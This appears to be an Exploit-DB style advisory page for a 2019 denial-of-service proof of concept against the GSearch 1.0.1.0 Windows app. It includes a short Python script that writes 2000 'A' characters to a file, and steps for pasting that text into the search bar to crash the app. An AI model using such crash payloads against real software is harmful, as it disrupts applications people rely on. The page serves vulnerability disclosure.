GSearch v1.0.1.0 - Denial of Service (PoC)

vendor:

GSearch

by:

0xB9

5.5

CVSS

MEDIUM

Denial of Service

CWE

Product Name: GSearch

Affected Version From: 1.0.1.0

Affected Version To: 1.0.1.0

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 10

2019

GSearch v1.0.1.0 – Denial of Service (PoC)

The GSearch application version 1.0.1.0 is vulnerable to a denial of service attack. By providing a specially crafted payload to the application, an attacker can cause the application to crash. This can be achieved by copying the payload text from the generated PoC.txt file, pasting it into the search bar of the application, and then clicking on any link.

Mitigation:

The vendor has not released a patch for this vulnerability. To mitigate the risk, users are advised to avoid pasting arbitrary text into the search bar of the GSearch application.

Source

Exploit-DB raw data:

# Exploit Title: GSearch v1.0.1.0 - Denial of Service (PoC)
# Date: 6/23/2019
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9NDTMZKLC693
# Version: 1.0.1.0
# Tested on: Windows 10

# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the search bar and click search
# Click any link and app will crash


buffer = "A" * 2000
payload = buffer
try:
    f = open("PoC.txt", "w")
    print("[+] Creating payload..")
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created")